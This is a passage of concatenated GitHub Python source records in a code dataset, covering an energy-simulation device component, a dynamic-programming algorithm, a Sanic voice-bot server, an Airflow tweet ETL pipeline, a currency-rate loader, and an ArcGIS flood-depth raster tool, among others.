i: offset\n + (i + 1) * minutes_per_timestep\n ]\n )\n / minutes_per_timestep\n )\n\n last = el_shiftable_load[offset + (i + 1) * minutes_per_timestep:]\n if offset != minutes_per_timestep:\n elem_el.append(sum(last) / (minutes_per_timestep - offset))\n electricity_profile.append(elem_el)\n\n self.source_weight = source_weight\n earliest_start = earliest_start + [\n self.my_simulation_parameters.timesteps\n ] # append value to continue simulation after last necesary run of flexible device at end of year\n self.earliest_start = utils.convert_lpg_timestep_to_utc(\n data=earliest_start,\n year=self.my_simulation_parameters.year,\n seconds_per_timestep=seconds_per_timestep,\n )\n latest_start = latest_start + [\n self.my_simulation_parameters.timesteps + 999\n ] # append value to continue simulation after last necesary run of smart device at end of year\n self.latest_start = utils.convert_lpg_timestep_to_utc(\n data=latest_start,\n year=self.my_simulation_parameters.year,\n seconds_per_timestep=seconds_per_timestep,\n )\n self.electricity_profile = electricity_profile\n self.state = SmartDeviceState()\n self.previous_state = SmartDeviceState()\n\n def write_to_report(self) -> List[str]:\n \"\"\"Writes relevant information to report.\"\"\"\n lines: List[str] = []\n lines.append(f\"DeviceName: {self.component_name}\")\n lines.append(f\"Consumption: {self.consumption:.2f}\")\n return lines\n\n def get_cost_opex(\n self,\n all_outputs: List,\n postprocessing_results: pd.DataFrame,\n ) -> OpexCostDataClass:\n \"\"\"Get opex costs.\"\"\"\n for index, output in enumerate(all_outputs):\n if (\n output.component_name == self.component_name\n and output.load_type == lt.LoadTypes.ELECTRICITY\n ):\n co2_per_unit = 0.4\n euro_per_unit = 0.25\n self.consumption = (\n sum(postprocessing_results.iloc[:, index])\n * self.my_simulation_parameters.seconds_per_timestep\n / 3.6e6\n )\n\n opex_cost_data_class = OpexCostDataClass(\n opex_cost=self.consumption * euro_per_unit,\n co2_footprint=self.consumption * co2_per_unit,\n consumption=self.consumption,\n )\n\n return opex_cost_data_class\n","repo_name":"FZJ-IEK3-VSA/HiSim","sub_path":"hisim/components/generic_smart_device.py","file_name":"generic_smart_device.py","file_ext":"py","file_size_in_byte":15178,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"70"}
+{"seq_id":"43034971498","text":"# Link: https://www.geeksforgeeks.org/shortest-common-supersequence/\n# A dynamic programming based python program \n# to find length of the shortest supersequence\n\n# Returns length of the \n# shortest supersequence of X and Y\n\nimport numpy as np\ndef superSeq(X,Y,n,m,lookup):\n\t\n\tif m==0 or n==0:\n\t\tlookup[n][m] = n+m\n\n\tif (lookup[n][m] == 0):\t \n\t\tif X[n-1]==Y[m-1]:\n\t\t\tlookup[n][m] = superSeq(X,Y,n-1,m-1,lookup)+1\n\t\n\t\telse:\n\t\t\tlookup[n][m] = min(superSeq(X,Y,n-1,m,lookup)+1,\n\t\t\t\t\t\t\tsuperSeq(X,Y,n,m-1,lookup)+1)\n\t\n\treturn lookup[n][m]\n\t\n\n\n# Driver Code\nX = \"AGGTAB\"\nY = \"GXTXAYB\"\n\nlookup = np.zeros([len(X)+1,len(Y)+1])\nprint(\"Length of the shortest supersequence is {}\"\n\t.format(superSeq(X,Y,len(X),len(Y),lookup)))","repo_name":"mohitsaroha03/The-Py-Algorithms","sub_path":"src/zDynamicprogramming/shortest-common-supersequence.py","file_name":"shortest-common-supersequence.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"19923043105","text":"from sanic import Sanic\nfrom sanic.response import json, file\nfrom sanic_session import InMemorySessionInterface\nfrom os.path import join, dirname, realpath\nfrom text_to_speach import text_to_speach\nimport string\nimport random\nimport requests\nimport ujson as j\nimport re\n\n\ndef generator(size=36, chars=string.ascii_uppercase + string.digits + string.ascii_lowercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\ndef clear_sting(string):\n reg = re.compile('[^a-zA-Z ]')\n return ((reg.sub('', string).strip()).lower()).replace(' ', '-')\n\napp = Sanic()\napp.static('/resources', './resources')\nsi = InMemorySessionInterface()\n\n\n@app.middleware('request')\nasync def add_session_to_request(request):\n await si.open(request)\n\n\n@app.middleware('response')\nasync def save_session(request, response):\n await si.save(request, response)\n\n\n@app.route(\"/\")\nasync def test(request):\n response = file(join(dirname(__file__),'websocket.html'))\n if not request['session'].get('sessionid'):\n request['session']['sessionid'] = generator()\n return await response\n\n@app.websocket('/feed')\nasync def feed(request, ws):\n while True:\n question = await ws.recv()\n data = {\n \"question\": question,\n \"sessionid\": request['session']['sessionid']\n }\n r = requests.get('http://localhost:5000/api/v1.0/ask', data)\n if r.status_code is not 200:\n answer = \"Something went wrong\"\n else:\n answer = r.json()['response']['answer']\n filename = clear_sting(answer)[0:143]\n text_to_speach(answer, filename)\n await ws.send(j.dumps({\n \"text\": answer,\n \"filename\": filename\n }))\n\nif __name__ == \"__main__\":\n app.run(\n host=\"0.0.0.0\",\n port=8080,\n debug=True\n )","repo_name":"vladimirmyshkovski/VoiceBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29819466946","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'django_twitter_search'\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^search/$', views.search, name=\"search\"),\n url(r'^save/$', views.save, name='save'),\n url(r'^archive/$', views.archive, name='archive'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n]\n","repo_name":"richardgiddings/django_twitter","sub_path":"django_twitter_search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29404677018","text":"from airflow import DAG\nfrom datetime import datetime, timedelta\nfrom airflow.providers.postgres.operators.postgres import PostgresOperator\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nfrom airflow.providers.amazon.aws.hooks.base_aws import AwsBaseHook\nfrom airflow.operators.python import PythonOperator\n\nfrom sql.sql_statements import sql_statements\nsql = sql_statements()\n\n\ndef insert_from_S3_to_redshift(*args,**kwargs):\n aws_kook = AwsBaseHook('aws_credentials',client_type='redshift')\n credentials = aws_kook.get_credentials()\n redshift_hook = PostgresHook(\"redshift\")\n execution_date = kwargs['execution_date']\n sql_stmt = sql.INSERT_INTO_STAGING_TWEETS_TABLE.format(\n staging_table='staging_tweets',\n s3_bucket='s3://twitter-data-stream/{year}/{month}/{day}/{hour}'.format(\n year=execution_date.year,\n month=str(execution_date.month).zfill(2),\n day=str(execution_date.day).zfill(2),\n hour=str(execution_date.hour).zfill(2)\n ),\n access_key_id=credentials.access_key,\n secret_access_key=credentials.secret_key,\n region='ap-northeast-1',\n json_path='s3://twitter-data-stream-support-files/main_staging_tweets.json'\n )\n redshift_hook.run(sql_stmt)\n\ndef insert_into_table(*args,**kwargs):\n redshift_hook = PostgresHook(\"redshift\")\n execution_date = kwargs['execution_date']\n sql_stmt = kwargs['sql'].format(\n year=execution_date.year,\n month=execution_date.month,\n day=execution_date.day,\n hour=execution_date.hour\n )\n redshift_hook.run(sql_stmt)\n\n\ndag = DAG(\n \"tweet_pipeline\",\n start_date=datetime(2021, 8, 16, 8, 0, 0, 0),\n schedule_interval='@hourly',\n)\n\ncreate_staging_tweets_table = PostgresOperator(\n task_id=\"create_staging_tweets_table\",\n dag=dag,\n sql=sql.CREATE_STAGING_TWEETS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\nstage_tweets_to_redshift = PythonOperator(\n task_id='stage_tweets',\n dag=dag,\n python_callable=insert_from_S3_to_redshift,\n provide_context=True\n)\n\ncreate_users_table = PostgresOperator(\n task_id=\"create_users_table\",\n dag=dag,\n sql=sql.CREATE_USERS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\ncreate_hashtags_table = PostgresOperator(\n task_id=\"create_hashtags_table\",\n dag=dag,\n sql=sql.CREATE_HASHTAGS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\ncreate_tweets_table = PostgresOperator(\n task_id=\"create_tweets_table\",\n dag=dag,\n sql=sql.CREATE_TWEETS_TABLE,\n postgres_conn_id=\"redshift\"\n)\n\n\ninsert_into_users_table = PythonOperator(\n task_id='insert_into_users_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_USERS_TABLE},\n provide_context=True\n)\n\ninsert_into_hasgtags_table = PythonOperator(\n task_id='insert_into_hashtags_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_HASHTAGS_TABLE},\n provide_context=True\n)\n\ninsert_into_tweets_table = PythonOperator(\n task_id='insert_into_tweets_table',\n dag=dag,\n python_callable=insert_into_table,\n op_kwargs={'sql':sql.INSERT_INTO_TWEETS_TABLE},\n provide_context=True\n)\n\n\ncreate_staging_tweets_table >> stage_tweets_to_redshift\nstage_tweets_to_redshift >> [create_users_table,create_hashtags_table,create_tweets_table]\ncreate_users_table >> insert_into_users_table\ncreate_hashtags_table >> insert_into_hasgtags_table\ncreate_tweets_table >> 
insert_into_tweets_table","repo_name":"nelsongcg/political_monitoring","sub_path":"etl/tweets_dag.py","file_name":"tweets_dag.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9491866016","text":"from dollar.models import DollarClp\nfrom datetime import datetime, timedelta\nimport pytz\nimport requests\nimport json\n\n\nBASE_URL_INDICADOR = \"https://mindicador.cl/api/dolar/\"\n\n\ndef make_date_range(init_date: str, end_date: str) -> list:\n \"\"\"Generates a list of dates in the format dd-mm-YYYY\n with input of dates YYYYmmdd\"\"\"\n obj_init = datetime.strptime(init_date, \"%Y%m%d\")\n obj_end = datetime.strptime(end_date, \"%Y%m%d\")\n days_difference = (obj_end - obj_init).days + 1 # inclusive el ultimo dia\n list_of_dates = list()\n for i in range(days_difference):\n date_new = obj_init + timedelta(days=i)\n list_of_dates.append(date_new.strftime(\"%d-%m-%Y\"))\n return list_of_dates\n\n\ndef make_urls(list_dates: list) -> list:\n \"\"\"Generate dollar query url by date\"\"\"\n new_list = list()\n for date_value in list_dates:\n new_list.append(BASE_URL_INDICADOR + date_value)\n return new_list\n\n\ndef parse_dollar_request(content_request: str) -> list:\n \"\"\"format the content of the request\"\"\"\n content_json = json.loads(content_request)\n if content_json[\"unidad_medida\"] == \"Pesos\" and content_json[\"codigo\"] == \"dolar\":\n return content_json[\"serie\"]\n\n\ndef make_response(list_urls: list) -> list:\n \"\"\"make a list of results based on url responses\"\"\"\n list_response = list()\n for url in list_urls:\n response = requests.get(url)\n list_response.append(parse_dollar_request(response.content))\n return list_response\n\n\ndef insert_dollar(list_data: list):\n \"\"\"Insert the elements in BD\"\"\"\n for data_dolar in list_data:\n if len(data_dolar) == 1:\n yesterday = datetime.strptime(data_dolar[0][\"fecha\"], '%Y-%m-%dT%H:%M:%S.%fZ') - timedelta(days=1)\n last_dollar = DollarClp.objects.filter(date=yesterday) # yesterday filter\n if len(last_dollar) >= 1:\n last_dollar = last_dollar.last()\n diff = data_dolar[0][\"valor\"] - last_dollar.price\n else:\n diff = 0\n new_dollar = DollarClp()\n new_dollar.price = data_dolar[0][\"valor\"]\n new_dollar.price_difference = diff\n new_dollar.date = datetime.strptime(data_dolar[0][\"fecha\"], '%Y-%m-%dT%H:%M:%S.%fZ')\n new_dollar.date_update = datetime.now(pytz.timezone('Chile/Continental'))\n new_dollar.business_day = True\n new_dollar.save()\n elif len(data_dolar) == 0:\n last_dollar = DollarClp.objects.all().order_by('date')\n if len(last_dollar) >= 1:\n last_dollar = last_dollar.last()\n yest_price = last_dollar.price\n yest_date = last_dollar.date\n else:\n continue # in this case there is not enough data to store a record\n new_dollar = DollarClp()\n new_dollar.price = yest_price\n new_dollar.price_difference = 0\n new_dollar.date = yest_date + timedelta(days=1)\n new_dollar.date_update = datetime.now(pytz.timezone('Chile/Continental'))\n new_dollar.business_day = False\n new_dollar.save()\n else:\n raise Exception(\"Cantidad de elementos no esperada\")","repo_name":"zkto/dollarBackend","sub_path":"backend/dollar/management/commands/_private.py","file_name":"_private.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"6660414980","text":"# Data Engineer Code Challenge - Levee\n\n# Importing libraries\nimport pandas as pd\nfrom datetime import datetime\n\n# Loading data from txt files into python dataframes\njobs_df = pd.read_csv(\"jobs.txt\", delimiter=\"|\")\ncategory_df = pd.read_csv(\"category.txt\", delimiter=\"|\")\n\n# Joining python dataframes into one\njoined_df = jobs_df.join(category_df.set_index(\"id\"), on=\"categoryId\")\n\n# Solution 1 - The number of Open Positions per Category Name\nsum_joined_df = joined_df.groupby([\"name\"]).sum()\nopen_positions_df = sum_joined_df[\"openPositionAmnt\"]\nprint(\"The number of Open Positions per Category Name: \\n\")\nprint(open_positions_df)\nprint(\"\\n\")\n\n# Solution 2 - The last three Jobs that have expired\ndate = datetime.today()\n\njoined_df[\"ExpiresAt\"] = pd.to_datetime(joined_df[\"ExpiresAt\"])\nexpired_positions_df = (\n joined_df.loc[joined_df[\"ExpiresAt\"] < date].sort_values(\"ExpiresAt\").iloc[-3:]\n)\nprint(\"The last three Jobs that have expired: \\n\")\nprint(expired_positions_df)\n","repo_name":"nobregacarol/levee","sub_path":"txt_get_results.py","file_name":"txt_get_results.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31758787551","text":"data = {\n 'user_id':0,\n 'channel_id': 0,\n 'message_id' : 0,\n 'user_list': {},\n 'channel_list': {},\n 'channel_id_list': [],\n 'session_id': 0,\n 'dm_id_list': [],\n \"dm_id\": 0,\n \"dm_list\": {},\n \"reset_codes\": {},\n\n}","repo_name":"orangemukduk/unsw-dreams","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10735286236","text":"import gdspy\nimport numpy as np\n\nfrom .utils import *\n\ndef wf_stitch(geometry, wf_size, overlap = 5, extent = 10e3):\n \"\"\" create the write field stitching layer for input geometry\n\n Args:\n geometry: gdspy object to define writefield stitches for. the\n position of this object should be consistent with\n the desired coordinate system\n wf_size: write field size in the same units as geometry\n overlap: the width of the stitch in the same units as geometry\n extent: defines the square of size 2*extent x 2*extent. the\n geometry must be entirely contained within this square\n for the intersection to work correctly\n \"\"\"\n h_intersect = []\n v_intersect = []\n for x in np.arange(-extent, extent, wf_size):\n horz = gdspy.Rectangle((-extent, x - overlap/2), (extent, x + overlap/2))\n vert = gdspy.Rectangle((x - overlap/2, -extent), (x + overlap/2, extent))\n h_intersect.append(gdspy.boolean(geometry, horz, 'and'))\n v_intersect.append(gdspy.boolean(geometry, vert, 'and'))\n\n stitches = []\n\n notnone = lambda x : x is not None\n\n for polygons in filter(notnone, h_intersect):\n for p in polygons.polygons:\n stitches.append(gdspy.Polygon(p).scale(0.9, 1.0, np.mean(p, axis = 0)))\n\n for polygons in filter(notnone, v_intersect):\n for p in polygons.polygons:\n stitches.append(gdspy.Polygon(p).scale(1.0, 0.9, np.mean(p, axis = 0)))\n\n return union(stitches)\n","repo_name":"Emigon/gdspy-addons","sub_path":"gdspy_addons/stitch.py","file_name":"stitch.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"40576214816","text":"def findSharedItems(first: set, second: set, third: set) -> str:\n for letter in first:\n if letter in second and letter in third:\n return letter\n\ntotalPriority = 0\n\nwith open('input.txt', 'r') as f:\n text = f.read()\n lines = text.split('\\n')\nfor i in range(0, len(lines), 3):\n first = set(lines[i])\n second = set(lines[i + 1])\n third = set(lines[i + 2])\n common = findSharedItems(first, second, third)\n if common.isupper():\n totalPriority += ord(common) - ord('A') + 27\n else:\n totalPriority += ord(common) - ord('a') + 1\n \n\nprint(totalPriority)","repo_name":"marinisaac1/advent2022","sub_path":"3/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11929422964","text":"import collections\r\n\r\nfrom src.helpers.connection_handler import is_netconf_socket_open\r\nfrom src.helpers.constants import connection_parameters, clean_connection_parameters, methods, filter_xml_files\r\nfrom src.helpers.parameter_handler import is_a_parameter_none\r\nfrom src.helpers.terminal_handler import get_error_string, get_bold_string, get_info_string\r\n\r\n\r\ndef get_connection():\r\n parameters = connection_parameters.copy()\r\n print(\"\\nThe default connection setup uses the PE switch \" + get_bold_string(parameters[\"host\"]) + \".\")\r\n choice = input(\"Would you like to setup your own connection: [N/y]\\t\") or \"N\"\r\n if choice == \"y\" or not is_netconf_socket_open(parameters.get(\"host\"), parameters.get(\"port\")):\r\n\r\n parameters = clean_connection_parameters.copy()\r\n\r\n while is_a_parameter_none(parameters):\r\n parameters[\"host\"] = input(\"Please enter the \" + get_info_string(\"host\") + \":\\t\") or None\r\n parameters[\"port\"] = input(\"Please enter the \" + get_info_string(\"port\") + \":\\t\") or None\r\n parameters[\"username\"] = input(\"Please enter the \" + get_info_string(\"username\") + \":\\t\") or None\r\n parameters[\"password\"] = input(\"Please enter the \" + get_info_string(\"password\") + \":\\t\") or None\r\n\r\n if not is_netconf_socket_open(parameters.get(\"host\"), parameters.get(\"port\")):\r\n parameters = clean_connection_parameters.copy()\r\n\r\n return parameters\r\n\r\n\r\ndef display_methods():\r\n for key in methods:\r\n print(\"- \" + key)\r\n return input(\"What would you like to do?: \\t\") or None\r\n\r\n\r\ndef get_filter():\r\n filter_xml = select_from_dict(filter_xml_files, \" filter\", \"\")\r\n\r\n Map = collections.namedtuple('Map', ['key', 'value'])\r\n key = filter_xml.key\r\n value = None\r\n\r\n if filter_xml.key != \"exit\":\r\n with open(\"./files/\" + filter_xml.value) as xml_file:\r\n value = xml_file.read()\r\n\r\n return Map(key, value)\r\n\r\n\r\ndef select_from_dict(selected_dict, selection_type, default=\"\"):\r\n print(\"\\n\")\r\n value = None\r\n key = None\r\n while value is None:\r\n try:\r\n for key in selected_dict.keys():\r\n print(\"- \" + key)\r\n key = input(\"Please select a\" + selection_type + \" from the list above: [\" + default + \"]\\t\") or default\r\n value = selected_dict[key]\r\n except KeyError:\r\n print(\"\\n\" + get_error_string(\"Please try again with these keys:\"))\r\n value = None\r\n\r\n Map = collections.namedtuple('Map', ['key', 'value'])\r\n return Map(key, value)\r\n","repo_name":"anjo-hsr/CloudInf","sub_path":"14-PYang/src/helpers/input_handler.py","file_name":"input_handler.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"2298940444","text":"import multiprocessing as mlt\nimport tqdm\nimport os\nimport numpy as np\n\nimport simulation.model as model\n\nimport simulation.backup as backup\nimport simulation.parameters as parameters\n\n\ndef get_heuristics():\n return model.get_heuristics()\n\n\ndef run(param):\n m = model.Model(param)\n return m.run()\n\n\ndef modify_t_max(params, t_max):\n params['t_max'] = t_max\n return params\n\n\ndef produce_data(parameters_file, data_file, t_max, random, force_params):\n \"\"\"\n Produce data for 'pooled' condition using multiprocessing\n :param parameters_file: Path to parameters file (string)\n :param data_file: Path to the future data files (dictionary with two entries)\n :return: a 'pool backup' (arbitrary Python object)\n \"\"\"\n\n json_parameters = parameters.load(parameters_file, random=random, force_params=force_params)\n\n if t_max != json_parameters['t_max']:\n json_parameters = modify_t_max(params=json_parameters, t_max=t_max)\n\n pool_parameters = parameters.extract_parameters(json_parameters)\n\n pl = mlt.Pool()\n\n backups = []\n\n for bkp in tqdm.tqdm(\n pl.imap(run, pool_parameters),\n total=len(pool_parameters)):\n backups.append(bkp)\n\n pool_backup = backup.PoolBackup(parameters=json_parameters, backups=backups)\n pool_backup.save(parameters_file, data_file)\n\n return pool_backup\n\n\ndef data_already_produced(*args):\n \"\"\"\n If data files already exist, return True\n :param args: Path to data files\n :return: True or False\n \"\"\"\n return np.all([os.path.exists(i) for i in args])\n\n\ndef pool(force, t_max, random, force_params):\n\n heuristics = model.get_heuristics()\n\n backups = {}\n\n for h in heuristics:\n\n parameters_file = \"simulation/config/pool_{}{}.json\".format(\n h, ('', '_random')[random],\n )\n\n data_file = \"simulation/results/pool_{}{}.p\".format(\n h, ('', '_random')[random],\n )\n\n if not data_already_produced(data_file) or force:\n pool_backup = produce_data(parameters_file, data_file,\n t_max=t_max, random=random, force_params=force_params)\n\n else:\n pool_backup = backup.PoolBackup.load(data_file)\n\n backups[h] = pool_backup\n\n return backups\n\n\ndef batch(force, t_max, random, force_params):\n heuristics = model.get_heuristics()\n\n backups = {}\n\n for h in heuristics:\n\n parameters_file = \"simulation/config/batch_{}{}.json\".format(\n h, ('', '_random')[random]\n )\n\n data_file = \"simulation/results/batch_{}{}.p\".format(\n h, ('', '_random')[random]\n )\n\n if not data_already_produced(data_file) or force:\n batch_backup = produce_data(parameters_file, data_file,\n t_max=t_max, random=random, force_params=force_params)\n\n else:\n batch_backup = backup.PoolBackup.load(data_file)\n\n backups[h] = batch_backup\n\n return backups\n\n\ndef individual(force=False, force_params=False):\n heuristics = model.get_heuristics()\n\n backups = {i: dict() for i in heuristics}\n\n for h in heuristics:\n\n for r in (\"25\", \"50\"):\n\n parameters_file = \"simulation/config/{}_{}.json\".format(r, h)\n data_file = \"simulation/results/{}_{}.p\".format(r, h)\n\n if not data_already_produced(parameters_file, data_file) or force:\n\n json_parameters = parameters.load(parameters_file, force_params, random=False)\n param = parameters.extract_parameters(json_parameters)\n run_backup = run(param)\n run_backup.save(parameters_file, data_file)\n\n else:\n run_backup = backup.RunBackup.load(data_file)\n\n backups[h][r] = run_backup\n\n return 
backups\n","repo_name":"AurelienNioche/DuopolyAnalysis","sub_path":"simulation/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"23562241814","text":"import arcpy\nimport time\nimport os\nimport re\n\nimport sys\nimport common_lib\nfrom common_lib import create_msg_body, msg, trace\nfrom settings import *\n\n# error classes\nclass NotProjected(Exception):\n pass\n\n\nclass NoNoDataError(Exception):\n pass\n\n\nclass LicenseError3D(Exception):\n pass\n\n\nclass LicenseErrorSpatial(Exception):\n pass\n\n\nclass NoUnits(Exception):\n pass\n\n\nclass NoInputLayer(Exception):\n pass\n\n\nclass NoDepthRaster(Exception):\n pass\n\n\nclass NoPolygons(Exception):\n pass\n\n\nclass SchemaLock(Exception):\n pass\n\n\nclass NotSupported(Exception):\n pass\n\n\nclass NoLayerFile(Exception):\n pass\n\n\nclass FunctionError(Exception):\n pass\n\n\nclass MixOfSR(Exception):\n pass\n\nWARNING = \"warning\"\n\n# used functions\n\ndef create_raster(input_source, depth_raster, depth_value, boundary_size, boundary_offset, output_raster, debug):\n try:\n # Get Attributes from User\n if debug == 0:\n # script variables\n aprx = arcpy.mp.ArcGISProject(\"CURRENT\")\n home_directory = aprx.homeFolder\n tiff_directory = home_directory + \"\\\\Tiffs\"\n tin_directory = home_directory + \"\\\\Tins\"\n scripts_directory = aprx.homeFolder + \"\\\\Scripts\"\n rule_directory = aprx.homeFolder + \"\\\\rule_packages\"\n log_directory = aprx.homeFolder + \"\\\\Logs\"\n layer_directory = home_directory + \"\\\\layer_files\"\n project_ws = aprx.defaultGeodatabase\n\n enableLogging = True\n DeleteIntermediateData = True\n verbose = 0\n in_memory_switch = True\n else:\n # debug\n home_directory = r'D:\\Temporary\\Flood\\3DFloodImpact'\n tiff_directory = home_directory + \"\\\\Tiffs\"\n log_directory = home_directory + \"\\\\Logs\"\n layer_directory = home_directory + \"\\\\LayerFiles\"\n project_ws = home_directory + \"\\\\Testing.gdb\"\n\n enableLogging = False\n DeleteIntermediateData = True\n verbose = 1\n in_memory_switch = False\n\n scratch_ws = common_lib.create_gdb(home_directory, \"Intermediate.gdb\")\n arcpy.env.workspace = scratch_ws\n arcpy.env.overwriteOutput = True\n\n # fail safe for Eurpose's comma's\n depth_value = float(re.sub(\"[,.]\", \".\", depth_value))\n boundary_size = float(re.sub(\"[,.]\", \".\", boundary_size))\n boundary_offset = float(re.sub(\"[,.]\", \".\", boundary_offset))\n\n bail = 0\n\n if debug == 1:\n use_in_memory = False\n else:\n use_in_memory = True\n\n common_lib.set_up_logging(log_directory, TOOLNAME)\n start_time = time.clock()\n\n if arcpy.CheckExtension(\"3D\") == \"Available\":\n arcpy.CheckOutExtension(\"3D\")\n\n if arcpy.CheckExtension(\"Spatial\") == \"Available\":\n arcpy.CheckOutExtension(\"Spatial\")\n\n # check if input exists\n if arcpy.Exists(input_source):\n arcpy.AddMessage(\"Processing input source: \" + common_lib.get_name_from_feature_class(input_source))\n\n no_initial_depth_raster = False\n\n # create isnull from input source\n if use_in_memory:\n is_null = \"in_memory/isnull_copy\"\n else:\n is_null = os.path.join(scratch_ws, \"isnull_copy\")\n\n if arcpy.Exists(is_null):\n arcpy.Delete_management(is_null)\n\n\n # check where we have NULL values\n is_Null_raster = arcpy.sa.IsNull(input_source)\n is_Null_raster.save(is_null)\n\n # if we have a depth raster as input: make sure it overlaps with input_source\n if depth_raster:\n if arcpy.Exists(depth_raster):\n # Check if same spatial reference!!!\n if common_lib.check_same_spatial_reference([input_source], [depth_raster]) == 1:\n depth_raster = None\n raise MixOfSR\n else:\n if use_in_memory:\n clip_raster = \"in_memory/clip_copy\"\n 
else:\n clip_raster = os.path.join(scratch_ws, \"clip_copy\")\n\n if arcpy.Exists(clip_raster):\n arcpy.Delete_management(clip_raster)\n\n # check extents\n # clip terrain to extent\n msg_body = create_msg_body(\"Clipping depth raster to input flooding layer extent\", 0, 0)\n msg(msg_body)\n\n arcpy.Clip_management(depth_raster, \"#\", clip_raster, input_source, \"#\", \"#\", \"MAINTAIN_EXTENT\")\n\n # TODO double check below\n # create IsNull to be used to check for NoData.\n if use_in_memory:\n is_null0 = \"in_memory/is_null0\"\n else:\n is_null0 = os.path.join(scratch_ws, \"is_null0\")\n if arcpy.Exists(is_null0):\n arcpy.Delete_management(is_null0)\n\n is_null_raster = arcpy.sa.IsNull(clip_raster)\n is_null_raster.save(is_null0)\n min_value = arcpy.GetRasterProperties_management(is_null0, \"MINIMUM\")[0]\n\n# all_nodata = arcpy.GetRasterProperties_management(clip_raster, \"ALLNODATA\")[0]\n\n if int(min_value) == 1:\n msg_body = create_msg_body(\"Input rasters do not overlap.\", 0, 0)\n msg(msg_body, WARNING)\n depth_raster = None\n else:\n org_depth_raster = depth_raster\n depth_raster = clip_raster\n no_initial_depth_raster = False\n\n # if depth_value > 0:\n # # grab set all values > 2 to default depth value\n # if use_in_memory:\n # depth_push = \"in_memory/depth_push\"\n # else:\n # depth_push = os.path.join(scratch_ws, \"depth_push\")\n #\n # if arcpy.Exists(depth_push):\n # arcpy.Delete_management(depth_push)\n #\n # msg_body = create_msg_body(\"Pushing depth > 2 to: \" + str(depth_value), 0, 0)\n # msg(msg_body)\n #\n # depth_pushRaster = arcpy.sa.Con(clip_raster, depth_value, clip_raster, \"VALUE > 2\")\n # depth_pushRaster.save(depth_push)\n #\n # depth_raster = depth_push\n # else:\n # depth_raster = clip_raster\n else:\n depth_raster = None\n raise NoDepthRaster\n\n # if we don't have a depth raster: crate one based on the depth value\n if not depth_raster:\n if depth_value != 0:\n no_initial_depth_raster = True\n\n arcpy.AddMessage(\"Using default depth value of: \" + str(depth_value))\n\n # create raster from default depth value\n if use_in_memory:\n depth_raster = \"in_memory/depth_value_raster\"\n else:\n depth_raster = os.path.join(scratch_ws, \"depth_value_raster\")\n\n if arcpy.Exists(depth_raster):\n arcpy.Delete_management(depth_raster)\n\n # create raster from default depth value\n msg_body = create_msg_body(\"Create depth raster from default depth value.\", 0, 0)\n msg(msg_body)\n\n outConRaster = arcpy.sa.Con(is_null, depth_value, depth_value)\n outConRaster.save(depth_raster)\n else:\n bail = 1\n msg_body = create_msg_body(\"No depth raster and default depth value is 0. 
No point continuing.\", 0, 0)\n msg(msg_body, WARNING)\n\n if bail == 0:\n # subtract depth raster from flood elevation raster\n cell_size_source = arcpy.GetRasterProperties_management(input_source, \"CELLSIZEX\")\n cell_size_depth = arcpy.GetRasterProperties_management(depth_raster, \"CELLSIZEX\")\n\n if cell_size_source.getOutput(0) == cell_size_depth.getOutput(0):\n if arcpy.Exists(output_raster):\n arcpy.Delete_management(output_raster)\n\n # create raster from depth values\n # adjust values that are less than 0.2\n if use_in_memory:\n depth_push = \"in_memory/depth_boundary_push\"\n depth_temp = \"in_memory/depth_temp\"\n else:\n depth_push = os.path.join(scratch_ws, \"depth_boundary_push\")\n\n if arcpy.Exists(depth_push):\n arcpy.Delete_management(depth_push)\n\n depth_temp = os.path.join(scratch_ws, \"depth_temp\")\n\n if arcpy.Exists(depth_temp):\n arcpy.Delete_management(depth_temp)\n\n msg_body = create_msg_body(\"Adjusting boundary values by: \" + str(boundary_offset), 0, 0)\n msg(msg_body)\n\n # add boundary offset to depth raster\n arcpy.Plus_3d(depth_raster, boundary_offset, depth_temp)\n\n depth_raster_object = arcpy.sa.Raster(depth_raster)\n\n # for values less than 0.2 -> grab adjusted depth raster.\n depth_push_Boundary_Raster = arcpy.sa.Con(depth_raster_object < 0.2, depth_temp, depth_raster)\n depth_push_Boundary_Raster.save(depth_push)\n\n depth_raster = depth_push\n\n if use_in_memory:\n clip_depth = \"in_memory/clip_depth\"\n else:\n 